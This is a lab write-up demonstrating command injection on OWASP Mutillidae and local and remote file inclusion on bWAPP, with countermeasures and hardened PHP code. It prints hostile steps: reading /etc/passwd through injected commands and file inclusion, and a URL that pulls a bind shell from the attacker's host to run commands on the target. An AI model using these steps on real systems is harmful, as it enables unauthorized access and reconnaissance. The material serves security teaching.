Practical Demonstration of Command Injection, LFI, and RFI Vulnerabilities in OWASP and Possible Countermeasures to Mitigate Them

Command Injection

We access OWASP Mutillidae.

Click on "OWASP 2013 > A1 - Injection (Other) > Command Injection > DNS Lookup".

We use the command pwd to find out the current working directory.

The list of users is obtained by reading the /etc/passwd file.

With the command ls -la, we can list all files and hidden files in the current directory.

The files in the /etc/apache2/ directory are listed.

With the command grep -i '(postgres|sql|db2|ora)', we check whether any user named postgres, sql, db2, or ora exists.

With the command ps -eaf | egrep -i '(postgres|sql|db2|ora)', we check whether there are active processes with those names and from which directory they are running.

All Apache modules currently enabled are listed.

All Apache modules available for enabling are listed.

Countermeasures for Command Injection

  • First countermeasure: Validate against a whitelist of allowed values.
  • Second countermeasure: Validate the input to be a number.
  • Third countermeasure: Validate that the input contains only alphanumeric characters, with no other syntax or whitespace (example of input that must be rejected: <?php echo 'hi'; ?>).
  • Fourth countermeasure: Whenever possible, use built-in functions instead of operating system commands (example: unlink($file) instead of calling rm).
  • Fifth countermeasure: Use filter_input to validate the value before it reaches a command. Example: <?php if ($targetIP = filter_input(INPUT_GET, 'ip', FILTER_VALIDATE_IP)) { $cmd = exec("ping " . escapeshellarg($targetIP)); } else { die("Please provide a valid IP address"); } ?>.
  • Sixth countermeasure: Avoid using exec(), shell_exec(), system(), passthru().
  • Seventh countermeasure: Avoid using strip_tags() for sanitization.

LFI/RFI

To exploit the LFI/RFI vulnerability, we navigate to the "bwapp" machine and select "Remote & Local File Inclusion (RFI/LFI)" from the dropdown.

We start by including local files to obtain system information. By including /etc/hostname, we get the machine's name.

All users in the /etc/passwd file are listed.

System groups are listed from the /etc/group file.

Including the /etc/apache2/apache2.conf file shows the Apache configuration.

We start Apache on our Kali machine and put its address in the URL, so that the page served by our Apache is displayed through the vulnerable include (remote file inclusion).

Bindshell

A bindshell is created to execute commands on the OWASP machine.

The PHP code is included in the URL: 10.0.2.4/bWAPP/rlfi.php?language=http://10.0.2.7/bind.shell.txt&action=go&comando=ls.

Through the shell, system commands are used to obtain information.

ls is used to list the files in the current directory.

The ps command is used to display all active processes on the vulnerable machine.

With the lshw command, a list of all detected hardware components is displayed.

The lsmod command shows the status of kernel modules.

The lspci command displays a list of the PCI devices on the system.

The w command shows active users on the system and what they are running.

lsof lists the files that running processes currently have open.

RFI/LFI Countermeasures

  • First countermeasure: Set the directives allow_url_fopen=off and allow_url_include=off in php.ini. allow_url_fopen permits remote files to be opened, and allow_url_include permits remote files to be loaded with require or include.
  • Second countermeasure: Restrict folders with write permissions to prevent the upload of malicious files.
  • Third countermeasure: When the file to include depends on user input, map the input to a predefined set of options (for example, a fixed list of allowed keys) instead of using it directly as a file name.
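As an added example, not code from the lab or from Mutillidae/bWAPP, the following PHP applies the countermeasures from both sections: the DNS-lookup handler validates and quotes its argument, and the language handler maps user input to a fixed list instead of using it as a path. The lang/ directory, the file names and the request parameter names are assumptions.

```php
<?php
// Added example: hardened versions of the two vulnerable patterns seen in the lab.
// Directory, file names and parameter names are assumed, not taken from the lab targets.

// Command injection: never concatenate raw input into a shell string.
// Validate with filter_var, then quote with escapeshellarg.
function dnsLookup(string $target): ?string
{
    // Accept either an IP address or a plain hostname (letters, digits, dot, hyphen).
    $isIp   = filter_var($target, FILTER_VALIDATE_IP) !== false;
    $isHost = (bool) preg_match('/^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$/', $target);
    if (!$isIp && !$isHost) {
        return null; // rejects shell metacharacters and whitespace outright
    }
    // escapeshellarg wraps the value in single quotes so it is passed as one argument.
    return shell_exec('nslookup ' . escapeshellarg($target));
}

// File inclusion: user input selects a key in a fixed map and is never used as a path,
// so neither a local path nor a remote URL can reach require().
function includeLanguage(string $lang): bool
{
    $allowed = [
        'en' => 'lang_en.php', // assumed file names under lang/
        'es' => 'lang_es.php',
    ];
    if (!array_key_exists($lang, $allowed)) {
        return false; // unknown key: include nothing
    }
    require __DIR__ . '/lang/' . $allowed[$lang];
    return true;
}

// Usage with request parameters (names assumed):
$target = (string) (filter_input(INPUT_GET, 'target_host', FILTER_DEFAULT) ?? '');
$result = dnsLookup($target);
echo $result === null ? 'Please provide a valid host' : htmlspecialchars($result);

$lang = (string) (filter_input(INPUT_GET, 'language', FILTER_DEFAULT) ?? 'en');
if (!includeLanguage($lang)) {
    http_response_code(400);
}
```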